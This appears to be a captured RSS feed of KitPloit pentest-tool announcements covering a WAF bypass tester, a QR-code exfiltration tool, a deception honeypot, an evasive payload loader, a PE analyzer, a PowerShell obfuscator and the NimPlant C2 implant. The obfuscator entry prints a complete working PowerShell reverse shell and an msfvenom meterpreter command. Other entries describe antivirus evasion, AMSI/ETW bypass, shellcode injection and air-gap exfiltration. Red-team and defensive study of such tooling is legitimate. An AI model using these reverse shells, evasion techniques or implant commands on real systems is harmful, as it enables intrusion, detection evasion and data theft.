FreshRSS

🔒
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayKitPloit - PenTest Tools!

Waf-Bypass - Check Your WAF Before An Attacker Does


WAF bypass Tool is an open source tool to analyze the security of any WAF for False Positives and False Negatives using predefined and customizable payloads. Check your WAF before an attacker does. WAF Bypass Tool is developed by Nemesida WAF team with the participation of community.


How to run

It is forbidden to use for illegal and illegal purposes. Don't break the law. We are not responsible for possible risks associated with the use of this software.

Run from Docker

The latest waf-bypass always available via the Docker Hub. It can be easily pulled via the following command:

# docker pull nemesida/waf-bypass
# docker run nemesida/waf-bypass --host='example.com'

Run source code from GitHub

# git clone https://github.com/nemesida-waf/waf_bypass.git /opt/waf-bypass/
# python3 -m pip install -r /opt/waf-bypass/requirements.txt
# python3 /opt/waf-bypass/main.py --host='example.com'

Options

  • '--proxy' (--proxy='http://proxy.example.com:3128') - option allows to specify where to connect to instead of the host.

  • '--header' (--header 'Authorization: Basic YWRtaW46YWRtaW4=' --header 'X-TOKEN: ABCDEF') - option allows to specify the HTTP header to send with all requests (e.g. for authentication). Multiple use is allowed.

  • '--user-agent' (--user-agent 'MyUserAgent 1/1') - option allows to specify the HTTP User-Agent to send with all requests, except when the User-Agent is set by the payload ("USER-AGENT").

  • '--block-code' (--block-code='403' --block-code='222') - option allows you to specify the HTTP status code to expect when the WAF is blocked. (default is 403). Multiple use is allowed.

  • '--threads' (--threads=15) - option allows to specify the number of parallel scan threads (default is 10).

  • '--timeout' (--timeout=10) - option allows to specify a request processing timeout in sec. (default is 30).

  • '--json-format' - an option that allows you to display the result of the work in JSON format (useful for integrating the tool with security platforms).

  • '--details' - display the False Positive and False Negative payloads. Not available in JSON format.

  • '--exclude-dir' - exclude the payload's directory (--exclude-dir='SQLi' --exclude-dir='XSS'). Multiple use is allowed.

Payloads

Depending on the purpose, payloads are located in the appropriate folders:

  • FP - False Positive payloads
  • API - API testing payloads
  • CM - Custom HTTP Method payloads
  • GraphQL - GraphQL testing payloads
  • LDAP - LDAP Injection etc. payloads
  • LFI - Local File Include payloads
  • MFD - multipart/form-data payloads
  • NoSQLi - NoSQL injection payloads
  • OR - Open Redirect payloads
  • RCE - Remote Code Execution payloads
  • RFI - Remote File Inclusion payloads
  • SQLi - SQL injection payloads
  • SSI - Server-Side Includes payloads
  • SSRF - Server-side request forgery payloads
  • SSTI - Server-Side Template Injection payloads
  • UWA - Unwanted Access payloads
  • XSS - Cross-Site Scripting payloads

Write your own payloads

When compiling a payload, the following zones, method and options are used:

  • URL - request's path
  • ARGS - request's query
  • BODY - request's body
  • COOKIE - request's cookie
  • USER-AGENT - request's user-agent
  • REFERER - request's referer
  • HEADER - request's header
  • METHOD - request's method
  • BOUNDARY - specifies the contents of the request's boundary. Applicable only to payloads in the MFD directory.
  • ENCODE - specifies the type of payload encoding (Base64, HTML-ENTITY, UTF-16) in addition to the encoding for the payload. Multiple values are indicated with a space (e.g. Base64 UTF-16). Applicable only to for ARGS, BODY, COOKIE and HEADER zone. Not applicable to payloads in API and MFD directories. Not compatible with option JSON.
  • JSON - specifies that the request's body should be in JSON format
  • BLOCKED - specifies that the request should be blocked (FN testing) or not (FP)

Except for some cases described below, the zones are independent of each other and are tested separately (those if 2 zones are specified - the script will send 2 requests - alternately checking one and the second zone).

For the zones you can use %RND% suffix, which allows you to generate an arbitrary string of 6 letters and numbers. (e.g.: param%RND=my_payload or param=%RND% OR A%RND%B)

You can create your own payloads, to do this, create your own folder on the '/payload/' folder, or place the payload in an existing one (e.g.: '/payload/XSS'). Allowed data format is JSON.

API directory

API testing payloads located in this directory are automatically appended with a header 'Content-Type: application/json'.

MFD directory

For MFD (multipart/form-data) payloads located in this directory, you must specify the BODY (required) and BOUNDARY (optional). If BOUNDARY is not set, it will be generated automatically (in this case, only the payload must be specified for the BODY, without additional data ('... Content-Disposition: form-data; ...').

If a BOUNDARY is specified, then the content of the BODY must be formatted in accordance with the RFC, but this allows for multiple payloads in BODY a separated by BOUNDARY.

Other zones are allowed in this directory (e.g.: URL, ARGS etc.). Regardless of the zone, header 'Content-Type: multipart/form-data; boundary=...' will be added to all requests.



QRExfiltrate - Tool That Allows You To Convert Any Binary File Into A QRcode Movie. The Data Can Then Be Reassembled Visually Allowing Exfiltration Of Data In Air Gapped Systems


This tool is a command line utility that allows you to convert any binary file into a QRcode GIF. The data can then be reassembled visually allowing exfiltration of data in air gapped systems. It was designed as a proof of concept to demonstrate weaknesses in DLP software; that is, the assumption that data will leave the system via email, USB sticks or other media.

The tool works by taking a binary file and converting it into a series of QR codes images. These images are then combined into a GIF file that can be easily reassembled using any standard QR code reader. This allows data to be exfiltrated without detection from most DLP systems.


How to Use

To use QRExfiltrate, open a command line and navigate to the directory containing the QRExfiltrate scripts.

Once you have done this, you can run the following command to convert your binary file into a QRcode GIF:

./encode.sh ./draft-taddei-ech4ent-introduction-00.txt output.gif

Demo

encode.sh <inputfile>

Where <inputfile> is the path to the binary file you wish to convert, and <outputfile>, if no output is specified output.gif used is the path to the desired output GIF file.

Once the command completes, you will have a GIF file containing the data from your binary file.

You can then transfer this GIF file as you wish and reassemble the data using any standard QR code reader.

Prerequisites

QRExfiltrate requires the following prerequisites:

  • qrencode
  • ffmpeg

Limitations

QRExfiltrate is limited by the size of the source data, qrencoding per frame has been capped to 64 bytes to ensure the resulting image has a uniform size and shape. Additionally the conversion to QR code results in a lot of storage overhead, on average the resulting gif is 50x larger than the original. Finally, QRExfiltrate is limited by the capabilities of the QR code reader. If the reader is not able to detect the QR codes from the GIF, the data will not be able to be reassembled.

The decoder script has been intentionally omitted

Conclusion

QRExfiltrate is a powerful tool that can be used to bypass DLP systems and exfiltrate data in air gapped networks. However, it is important to note that QRExfiltrate should be used with caution and only in situations where the risk of detection is low.



Mimicry - Security Tool For Active Deception In Exploitation And Post-Exploitation


Mimicry is a security tool developed by Chaitin Technology for active deception in exploitation and post-exploitation.

Active deception can live migrate the attacker to the honeypot without awareness. We can achieve a higher security level at a lower cost with Active deception.

English | 中文文档


Demo

Mimicry is a security tool developed by Chaitin Technology for active deception in exploitation and post-exploitation. (4)

️
Quick Start

1. Make sure docker, docker-compose is installed correctly on the machine

docker info
docker-compose version

2. Install honeypot service

docker-compose build
docker-compose up -d

3. Deploy deception tool on other machines

update config.yaml,replace ${honeypot_public_ip} to the public IP of honeypot service

4. Perform Webshell deceiving

./mimicry-tools webshell -c config.yaml -t php -p webshell_path

Advance Usage

Tool Description
Web-Deception Fake vulnerabilities in web applications
Webshell-Deception live migrate webshell to the honeypot
Shell-Deception live migrate ReverseShell/BindShell to the honeypot

️
Contact Us

  1. You can make bug feedback and feature suggestions directly through GitHub Issues.
  2. You can join the discussion group on Discord .


APCLdr - Payload Loader With Evasion Features


Payload Loader With Evasion Features.

Features:

  • no crt functions imported
  • indirect syscalls using HellHall
  • api hashing using CRC32 hashing algorithm
  • payload encryption using rc4 - payload is saved in .rsrc
  • Payload injection using APC calls - alertable thread
  • Payload execution using APC - alertable thread
  • Execution delation using MsgWaitForMultipleObjects - edit this
  • the total size is 8kb + the payload size
  • compatible with LLVM (clang-cl) Option

Usage:

  • Use Builder to update the PayloadFile.pf file, that'll be the encrypted payload to be saved in the .rsrc section of the loader
  • Compile as x64 Release

Debugging:

  • Change Linker>SubSystem from /SUBSYSTEM:WINDOWS to /SUBSYSTEM:CONSOLE
  • Set the loader in debug mode (uncomment this)
  • build as release as well

Thanks For:


Tested with cobalt strike && Havoc on windows 10



PortexAnalyzerGUI - Graphical Interface For PortEx, A Portable Executable And Malware Analysis Library



Graphical interface for PortEx, a Portable Executable and Malware Analysis Library

Download

Releases page

Features

  • Header information from: MSDOS Header, Rich Header, COFF File Header, Optional Header, Section Table
  • PE Structures: Import Section, Resource Section, Export Section, Debug Section
  • Scanning for file format anomalies
  • Visualize file structure, local entropies and byteplot, and save it as PNG
  • Calculate Shannon Entropy, Imphash, MD5, SHA256, Rich and RichPV hash
  • Overlay and overlay signature scanning
  • Version information and manifest
  • Icon extraction and saving as PNG
  • Customized signature scanning via Yara. Internal signature scans using PEiD signatures and an internal filetype scanner.

Supported OS and JRE

I test this program on Linux and Windows. But it should work on any OS with JRE version 9 or higher.

Future

I will be including more and more features that PortEx already provides.

These features include among others:

  • customized visualization
  • extraction and conversion of icons to .ICO files
  • dumping of sections, overlay, resources
  • export reports to txt, json, csv

Some of these features are already provided by PortexAnalyzer CLI version, which you can find here: PortexAnalyzer CLI

Donations

I develop PortEx and PortexAnalyzer as a hobby in my free time. If you like it, please consider buying me a coffee: https://ko-fi.com/struppigel

Author

Karsten Hahn

Twitter: @Struppigel

Mastodon: struppigel@infosec.exchange

Youtube: MalwareAnalysisForHedgehogs

License

License



Invoke-PSObfuscation - An In-Depth Approach To Obfuscating The Individual Components Of A PowerShell Payload Whether You'Re On Windows Or Kali Linux


Traditional obfuscation techniques tend to add layers to encapsulate standing code, such as base64 or compression. These payloads do continue to have a varied degree of success, but they have become trivial to extract the intended payload and some launchers get detected often, which essentially introduces chokepoints.

The approach this tool introduces is a methodology where you can target and obfuscate the individual components of a script with randomized variations while achieving the same intended logic, without encapsulating the entire payload within a single layer. Due to the complexity of the obfuscation logic, the resulting payloads will be very difficult to signature and will slip past heuristic engines that are not programmed to emulate the inherited logic.

While this script can obfuscate most payloads successfully on it's own, this project will also serve as a standing framework that I will to use to produce future functions that will utilize this framework to provide dedicated obfuscated payloads, such as one that only produces reverse shells.

I wrote a blog piece for Offensive Security as a precursor into the techniques this tool introduces. Before venturing further, consider giving it a read first: https://www.offensive-security.com/offsec/powershell-obfuscation/


Dedicated Payloads

As part of my on going work with PowerShell obfuscation, I am building out scripts that produce dedicated payloads that utilize this framework. These have helped to save me time and hope you find them useful as well. You can find them within their own folders at the root of this repository.

  1. Get-ReverseShell
  2. Get-DownloadCradle
  3. Get-Shellcode

Components

Like many other programming languages, PowerShell can be broken down into many different components that make up the executable logic. This allows us to defeat signature-based detections with relative ease by changing how we represent individual components within a payload to a form an obscure or unintelligible derivative.

Keep in mind that targeting every component in complex payloads is very instrusive. This tool is built so that you can target the components you want to obfuscate in a controlled manner. I have found that a lot of signatures can be defeated simply by targeting cmdlets, variables and any comments. When using this against complex payloads, such as print nightmare, keep in mind that custom function parameters / variables will also be changed. Always be sure to properly test any resulting payloads and ensure you are aware of any modified named paramters.

Component types such as pipes and pipeline variables are introduced here to help make your payload more obscure and harder to decode.

Supported Types

  • Aliases (iex)
  • Cmdlets (New-Object)
  • Comments (# and <# #>)
  • Integers (4444)
  • Methods ($client.GetStream())
  • Namespace Classes (System.Net.Sockets.TCPClient)
  • Pipes (|)
  • Pipeline Variables ($_)
  • Strings ("value" | 'value')
  • Variables ($client)

Generators

Each component has its own dedicated generator that contains a list of possible static or dynamically generated values that are randomly selected during each execution. If there are multiple instances of a component, then it will iterative each of them individually with a generator. This adds a degree of randomness each time you run this tool against a given payload so each iteration will be different. The only exception to this is variable names.

If an algorithm related to a specific component starts to cause a payload to flag, the current design allows us to easily modify the logic for that generator without compromising the entire script.

$Picker = 1..6 | Get-Random
Switch ($Picker) {
1 { $NewValue = 'Stay' }
2 { $NewValue = 'Off' }
3 { $NewValue = 'Ronins' }
4 { $NewValue = 'Lawn' }
5 { $NewValue = 'And' }
6 { $NewValue = 'Rocks' }
}

Requirements

This framework and resulting payloads have been tested on the following operating system and PowerShell versions. The resulting reverse shells will not work on PowerShell v2.0

PS Version OS Tested Invoke-PSObfucation.ps1 Reverse Shell
7.1.3 Kali 2021.2 Supported Supported
5.1.19041.1023 Windows 10 10.0.19042 Supported Supported
5.1.21996.1 Windows 11 10.0.21996 Supported Supported

Usage Examples

CVE-2021-34527 (PrintNightmare)

┌──(tristram㉿kali)-[~]
└─$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.

https://aka.ms/powershell
Type 'help' to get help.

PS /home/tristram> . ./Invoke-PSObfuscation.ps1
PS /home/tristram> Invoke-PSObfuscation -Path .\CVE-2021-34527.ps1 -Cmdlets -Comments -NamespaceClasses -Variables -OutFile o-printnightmare.ps1

>> Layer 0 Obfuscation
>> https://github.com/gh0x0st

[*] Obfuscating namespace classes
[*] Obfuscating cmdlets
[*] Obfuscating variables
[-] -DriverName is now -QhYm48JbCsqF
[-] -NewUser is now -ybrcKe
[-] -NewPassword is now -ZCA9QHerOCrEX84gMgNwnAth
[-] -DLL is now -dNr
[-] -ModuleName is now -jd
[-] -Module is now -tu3EI0q1XsGrniAUzx9WkV2o
[-] -Type is now -fjTOTLDCGufqEu
[-] -FullName is now -0vEKnCqm
[-] -EnumElements is now -B9aFqfvDbjtOXPxrR< br/>[-] -Bitfield is now -bFUCG7LB9gq50p4e
[-] -StructFields is now -xKryDRQnLdjTC8
[-] -PackingSize is now -0CB3X
[-] -ExplicitLayout is now -YegeaeLpPnB
[*] Removing comments
[*] Writing payload to o-printnightmare.ps1
[*] Done

PS /home/tristram>

PowerShell Reverse Shell

$client = New-Object System.Net.Sockets.TCPClient("127.0.0.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Generator 2 >> 4444 >> $(0-0+0+0-0-0+0+4444) Generator 1 >> 65535 >> $((65535)) [*] Obfuscating strings Generator 2 >> 127.0.0.1 >> $([char](16*49/16)+[char](109*50/109)+[char](0+55-0)+[char](20*46/20)+[char](0+48-0)+[char](0+46-0)+[char](0+48-0)+[char](0+46-0)+[char](51*49/51)) Generator 2 >> PS >> $([char](1*80/1)+[char](86+83-86)+[char](0+32-0)) Generator 1 >> > >> ([string]::join('', ( (62,32) |%{ ( [char][int] $_)})) | % {$_}) [*] Obfuscating cmdlets Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) Generator 1 >> Out-String >> & (("Tpltq1LeZGDhcO4MunzVC5NIP-vfWow6RxXSkbjYAU0aJm3KEgH2sFQr7i8dy9B")[13,16,3,25,35,3,55,57,17,49] -join '') [*] Writing payload to /home/tristram/obfuscated.ps1 [*] Done" dir="auto">
┌──(tristram㉿kali)-[~]
└─$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.

https://aka.ms/powershell
Type 'help' to get help.

PS /home/tristram> . ./Invoke-PSObfuscation.ps1
PS /home/tristram> Invoke-PSObfuscation -Path ./revshell.ps1 -Integers -Cmdlets -Strings -ShowChanges

>> Layer 0 Obfuscation
>> https://github.com/gh0x0st

[*] Obfuscating integers
Generator 2 >> 4444 >> $(0-0+0+0-0-0+0+4444)
Generator 1 >> 65535 >> $((65535))
[*] Obfuscating strings
Generator 2 >> 127.0.0.1 >> $([char](16*49/16)+[char](109*50/109)+[char](0+55-0)+[char](20*46/20)+[char](0+48-0)+[char](0+46-0)+[char](0+48-0)+[char](0+46-0)+[char](51*49/51))
Generator 2 >> PS >> $([char](1 *80/1)+[char](86+83-86)+[char](0+32-0))
Generator 1 >> > >> ([string]::join('', ( (62,32) |%{ ( [char][int] $_)})) | % {$_})
[*] Obfuscating cmdlets
Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_})
Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_})
Generator 1 >> Out-String >> & (("Tpltq1LeZGDhcO4MunzVC5NIP-vfWow6RxXSkbjYAU0aJm3KEgH2sFQr7i8dy9B")[13,16,3,25,35,3,55,57,17,49] -join '')
[*] Writing payload to /home/tristram/obfuscated.ps1
[*] Done

Obfuscated PowerShell Reverse Shell

Meterpreter PowerShell Shellcode

┌──(tristram㉿kali)-[~]
└─$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.

https://aka.ms/powershell
Type 'help' to get help.

PS /home/kali> msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 EXITFUNC=thread -f ps1 -o meterpreter.ps1
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 686 bytes
Final size of ps1 file: 3385 bytes
Saved as: meterpreter.ps1
PS /home/kali> . ./Invoke-PSObfuscation.ps1
PS /home/kali> Invoke-PSObfuscation -Path ./meterpreter.ps1 -Integers -Variables -OutFile o-meterpreter.ps1

>> Layer 0 Obfuscation
>> https://github.com/gh0x0st

[*] Obfuscating integers
[*] Obfuscating variables
[*] Writing payload to o-meterpreter.ps1
[*] Done

Comment-Based Help

<#
.SYNOPSIS
Transforms PowerShell scripts into something obscure, unclear, or unintelligible.

.DESCRIPTION
Where most obfuscation tools tend to add layers to encapsulate standing code, such as base64 or compression,
they tend to leave the intended payload intact, which essentially introduces chokepoints. Invoke-PSObfuscation
focuses on replacing the existing components of your code, or layer 0, with alternative values.

.PARAMETER Path
A user provided PowerShell payload via a flat file.

.PARAMETER All
The all switch is used to engage every supported component to obfuscate a given payload. This action is very intrusive
and could result in your payload being broken. There should be no issues when using this with the vanilla reverse
shell. However, it's recommended to target specific components with more advanced payloads. Keep in mind that some of
the generators introduced in this script may even confuse your ISE so be sure to test properly.

.PARAMETER Aliases
The aliases switch is used to instruct the function to obfuscate aliases.

.PARAMETER Cmdlets
The cmdlets switch is used to instruct the function to obfuscate cmdlets.

.PARAMETER Comments
The comments switch is used to instruct the function to remove all comments.

.PARAMETER Integers
The integers switch is used to instruct the function to obfuscate integers.

.PARAMETER Methods
The methods switch is used to instruct the function to obfuscate method invocations.

.PARAMETER NamespaceClasses
The namespaceclasses switch is used to instruct the function to obfuscate namespace classes.

.PARAMETER Pipes
The pipes switch is used to in struct the function to obfuscate pipes.

.PARAMETER PipelineVariables
The pipeline variables switch is used to instruct the function to obfuscate pipeline variables.

.PARAMETER ShowChanges
The ShowChanges switch is used to instruct the script to display the raw and obfuscated values on the screen.

.PARAMETER Strings
The strings switch is used to instruct the function to obfuscate prompt strings.

.PARAMETER Variables
The variables switch is used to instruct the function to obfuscate variables.

.EXAMPLE
PS C:\> Invoke-PSObfuscation -Path .\revshell.ps1 -All

.EXAMPLE
PS C:\> Invoke-PSObfuscation -Path .\CVE-2021-34527.ps1 -Cmdlets -Comments -NamespaceClasses -Variables -OutFile o-printernightmare.ps1

.OUTPUTS
System.String, System.String

.NOTES
Additional information abo ut the function.
#>


NimPlant - A Light-Weight First-Stage C2 Implant Written In Nim


By Cas van Cooten (@chvancooten), with special thanks to some awesome folks:

  • Fabian Mosch (@S3cur3Th1sSh1t) for sharing dynamic invocation implementation in Nim and the Ekko sleep mask function
  • snovvcrash (@snovvcrash) for adding the initial version of execute-assembly & self-deleting implant option
  • Furkan Göksel (@frkngksl) for his work on NiCOFF and Guillaume Caillé (@OffenseTeacher) for the initial implementation of inline-execute
  • Kadir Yamamoto (@yamakadi) for the design work, initial Vue.JS front-end and rusty nimplant, part of an older branch (unmaintained)
  • Mauricio Velazco (@mvelazco), Dylan Makowski (@AnubisOnSec), Andy Palmer (@pivotal8ytes), Medicus Riddick (@retsdem22), Spencer Davis (@nixbyte), and Florian Roth (@cyb3rops), for their efforts in testing the pre-release and contributing detections

Feature Overview

  • Lightweight and configurable implant written in the Nim programming language
  • Pretty web GUI that will make you look cool during all your ops
  • Encryption and compression of all traffic by default, obfuscates static strings in implant artefacts
  • Support for several implant types, including native binaries (exe/dll), shellcode or self-deleting executables
  • Wide selection of commands focused on early-stage operations including local enumeration, file or registry management, and web interactions
  • Easy deployment of more advanced functionality or payloads via inline-execute, shinject (using dynamic invocation), or in-thread execute-assembly
  • Support for operations on any platform, implant only targeting x64 Windows for now
  • Comprehensive logging of all interactions and file operations
  • Much, much more, just see below :)

Instructions

Installation

  • Install Nim and Python3 on your OS of choice (installation via choosenim is recommended, as apt doesn't always have the latest version).
  • Install required packages using the Nimble package manager (cd client; nimble install -d).
  • Install requirements.txt from the server folder (pip3 install -r server/requirements.txt).
  • If you're on Linux or MacOS, install the mingw toolchain for your platform (brew install mingw-w64 or apt install mingw-w64).

Getting Started

Configuration

Before using NimPlant, create the configuration file config.toml. It is recommended to copy config.toml.example and work from there.

An overview of settings is provided below.

Category Setting Description
server ip The IP that the C2 web server (including API) will listen on. Recommended to use 127.0.0.1, only use 0.0.0.0 when you have setup proper firewall or routing rules to protect the C2.
server port The port that the C2 web server (including API) will listen on.
listener type The listener type, either HTTP or HTTPS. HTTPS options configured below.
listener sslCertPath The local path to a HTTPS certificate file (e.g. requested via LetsEncrypt CertBot or self-signed). Ignored when listener type is 'HTTP'.
listener sslKeyPath The local path to the corresponding HTTPS certificate private key file. Password will be prompted when running the NimPlant server if set. Ignored when listener type is 'HTTP'.
listener hostname The listener hostname. If not empty (""), NimPlant will use this hostname to connect. Make sure you are properly routing traffic from this host to the NimPlant listener port.
listener ip The listener IP. Required even if 'hostname' is set, as it is used by the server to register on this IP.
listener port The listener port. Required even if 'hostname' is set, as it is used by the server to register on this port.
listener registerPath The URI path that new NimPlants will register with.
listener taskPath The URI path that NimPlants will get tasks from.
listener resultPath The URI path that NimPlants will submit results to.
nimplant riskyMode Compile NimPlant with support for risky commands. Operator discretion advised. Disabling will remove support for execute-assembly, powershell, shell and shinject.
nimplant sleepMask Whether or not to use Ekko sleep mask instead of regular sleep calls for Nimplants. Only works with regular executables for now!
nimplant sleepTime The default sleep time in seconds for new NimPlants.
nimplant sleepJitter The default jitter in percent for new NimPlants.
nimplant killDate The kill date for Nimplants (format: yyyy-MM-dd). Nimplants will exit if this date has passed.
nimplant userAgent The user-agent used by NimPlants. The server also uses this to validate NimPlant traffic, so it is recommended to choose a UA that is inconspicuous, but not too prevalent.

Compilation

Once the configuration is to your liking, you can generate NimPlant binaries to deploy on your target. Currently, NimPlant supports .exe, .dll, and .bin binaries for (self-deleting) executables, libraries, and position-independent shellcode (through sRDI), respectively. To generate, run python NimPlant.py compile followed by your preferred binaries (exe, exe-selfdelete, dll, raw, or all) and, optionally, the implant type (nim, or nim-debug). Files will be written to client/bin/.

You may pass the rotatekey argument to generate and use a new XOR key during compilation.

Notes:

  • NimPlant only supports x64 at this time!
  • The entrypoint for DLL files is Update, which is triggered by DllMain for all entrypoints. This means you can use e.g. rundll32 .\NimPlant.dll,Update to trigger, or use your LOLBIN of choice to sideload it (may need some modifications in client/NimPlant.nim)
PS C:\NimPlant> python .\NimPlant.py compile all

* *(# #
** **(## ##
######## ( ********
####(###########************,****
# ######## ******** *
.### ***
.######## ********
#### ### *** ****
######### ### *** *********
####### #### ## ** **** *******
##### ## * ** *****
###### #### ##*** **** .******
############### ***************
########## **********
#########**********
#######********
_ _ _ ____ _ _
| \ | (_)_ __ ___ | _ \| | __ _ _ __ | |_
| \| | | '_ ` _ \| |_) | |/ _` | '_ \| __|
| |\ | | | | | | | __/| | (_| | | | | |_
|_| \_|_|_| |_| |_|_| |_|\__ ,_|_| |_|\__|

A light-weight stage 1 implant and C2 based on Nim and Python
By Cas van Cooten (@chvancooten)

Compiling .exe for NimPlant
Compiling self-deleting .exe for NimPlant
Compiling .dll for NimPlant
Compiling .bin for NimPlant

Done compiling! You can find compiled binaries in 'client/bin/'.

Compilation with Docker

The Docker image chvancooten/nimbuild can be used to compile NimPlant binaries. Using Docker is easy and avoids dependency issues, as all required dependencies are pre-installed in this container.

To use it, install Docker for your OS and start the compilation in a container as follows.

docker run --rm -v `pwd`:/usr/src/np -w /usr/src/np chvancooten/nimbuild python3 NimPlant.py compile all

Usage

Once you have your binaries ready, you can spin up your NimPlant server! No additional configuration is necessary as it reads from the same config.toml file. To launch a server, simply run python NimPlant.py server (with sudo privileges if running on Linux). You can use the console once a Nimplant checks in, or access the web interface at http://localhost:31337 (by default).

Notes:

  • If you are running your NimPlant server externally from the machine where binaries are compiled, make sure that both config.toml and .xorkey match. If not, NimPlant will not be able to connect.
  • The web frontend or API do not support authentication, so do NOT expose the frontend port to any untrusted networks without a secured reverse proxy!
  • If NimPlant cannot connect to a server or loses connection, it will retry 5 times with an exponential backoff time before attempting re-registration. If it fails to register 5 more times (same backoff logic), it will kill itself. The backoff triples the sleep time on each failed attempt. For example, if the sleep time is 10 seconds, it will wait 10, then 30 (3^1 * 10), then 90 (3^2 * 10), then 270 (3^3 * 10), then 810 seconds before giving up (these parameters are hardcoded but can be changed in client/NimPlant.nim).
  • Logs are stored in the server/logs directory. Each server instance creates a new log folder, and logs are split per console/nimplant session. Downloads and uploads (including files uploaded via the web GUI) are stored in the server/uploads and server/downloads directories respectively.
  • Nimplant and server details are stored in an SQLite database at server/nimplant.db. This data is also used to recover Nimplants after a server restart.
  • Logs, uploaded/downloaded files, and the database can be cleaned up by running NimPlant.py with the cleanup flag. Caution: This will purge everything, so make sure to back up what you need first!
PS C:\NimPlant> python .\NimPlant.py server     

* *(# #
** **(## ##
######## ( ********
####(###########************,****
# ######## ******** *
.### ***
.######## ********
#### ### *** ****
######### ### *** *********
####### #### ## ** **** *******
##### ## * ** *****
###### #### ##*** **** .******
############### ***************
########## **********
#########**********
#######********
_ _ _ ____ _ _
| \ | (_)_ __ ___ | _ \| | __ _ _ __ | |_
| \| | | '_ ` _ \| |_) | |/ _` | '_ \| __|
| |\ | | | | | | | __/| | (_| | | | | |_
|_| \_|_|_| |_| |_|_| |_|\__ ,_|_| |_|\__|

A light-weight stage 1 implant and C2 written in Nim and Python
By Cas van Cooten (@chvancooten)

[06/02/2023 10:47:23] Started management server on http://127.0.0.1:31337.
[06/02/2023 10:47:23] Started NimPlant listener on https://0.0.0.0:443. CTRL-C to cancel waiting for NimPlants.

This will start both the C2 API and management web server (in the example above at http://127.0.0.1:31337) and the NimPlant listener (in the example above at https://0.0.0.0:443). Once a NimPlant checks in, you can use both the web interface and the console to send commands to NimPlant.

Available commands are as follows. You can get detailed help for any command by typing help [command]. Certain commands denoted with (GUI) can be configured graphically when using the web interface, this can be done by calling the command without any arguments.

Command arguments shown as [required] <optional>.
Commands with (GUI) can be run without parameters via the web UI.

cancel Cancel all pending tasks.
cat [filename] Print a file's contents to the screen.
cd [directory] Change the working directory.
clear Clear the screen.
cp [source] [destination] Copy a file or directory.
curl [url] Get a webpage remotely and return the results.
download [remotefilepath] <localfilepath> Download a file from NimPlant's disk to the NimPlant server.
env Get environment variables.
execute-assembly (GUI) <BYPASSAMSI=0> <BLOCKETW=0> [localfilepath] <arguments> Execute .NET assembly from memory. AMSI/ETW patched by default. Loads the CLR.
exit Exit the server, killing all NimPlants.
getAv List Antivirus / EDR products on target using WMI.
getDom Get the domain the target is joined to.
getLocalAdm List local administrators on the target using WMI.
getpid Show process ID of the currently selected NimPlant.
getprocname Show process name of the currently selected NimPlant.
help <command> Show this help menu or command-specific help.
hostname Show hostname of the currently selected NimPlant.
inline-execute (GUI) [localfilepath] [entrypoint] <arg1 type1 arg2 type2..> Execute Beacon Object Files (BOF) from memory.
ipconfig List IP address information of the currently selected NimPlant.
kill Kill the currently selected NimPlant.
list Show list of active NimPlants.
listall Show list of all NimPlants.
ls <path> List files and folders i n a certain directory. Lists current directory by default.
mkdir [directory] Create a directory (and its parent directories if required).
mv [source] [destination] Move a file or directory.
nimplant Show info about the currently selected NimPlant.
osbuild Show operating system build information for the currently selected NimPlant.
powershell <BYPASSAMSI=0> <BLOCKETW=0> [command] Execute a PowerShell command in an unmanaged runspace. Loads the CLR.
ps List running processes on the target. Indicates current process.
pwd Get the current working directory.
reg [query|add] [path] <key> <value> Query or modify the registry. New values will be added as REG_SZ.
rm [file] Remove a file or directory.
run [binary] <arguments> Run a binary from disk. Returns output but blocks NimPlant while running.
screenshot Take a screenshot of the user's screen.
select [id] Select another NimPlant.
shell [command] Execute a shell command.
shinject (GUI) [targetpid] [localfilepath] Load raw shellcode from a file and inject it into the specified process's memory space using dynamic invocation.
sleep [sleeptime] <jitter%> Change the sleep time of the current NimPlant.
upload (GUI) [localfilepath] <remotefilepath> Upload a file from the NimPlant server to the victim machine.
wget [url] <remotefilepath> Download a file to disk remotely.
whoami Get the user ID that NimPlant is running as.

Using Beacon Object Files (BOFs)

NOTE: BOFs are volatile by nature, and running a faulty BOF or passing wrong arguments or types WILL crash your NimPlant session! Make sure to test BOFs before deploying!

NimPlant supports the in-memory loading of BOFs thanks to the great NiCOFF project. Running a bof requires a local compiled BOF object file (usually called something like bofname.x64.o), an entrypoint (commonly go), and a list of arguments with their respective argument types. Arguments are passed as a space-seperated arg argtype pair.

Argument are given in accordance with the "Zzsib" format, so can be either string (alias: z), wstring (or Z), integer (aliases: int or i), short (s), or binary (bin or b). Binary arguments can be a raw binary string or base64-encoded, the latter is recommended to avoid bad characters.

Some examples of usage (using the magnificent TrustedSec BOFs [1, 2] as an example) are given below. Note that inline-execute (without arguments) can be used to configure the command graphically in the GUI.

# Run a bof without arguments
inline-execute ipconfig.x64.o go

# Run the `dir` bof with one wide-string argument specifying the path to list, quoting optional
inline-execute dir.x64.o go "C:\Users\victimuser\desktop" Z

# Run an injection BOF specifying an integer for the process ID and base64-encoded shellcode as bytes
# Example shellcode generated with the command: msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f base64
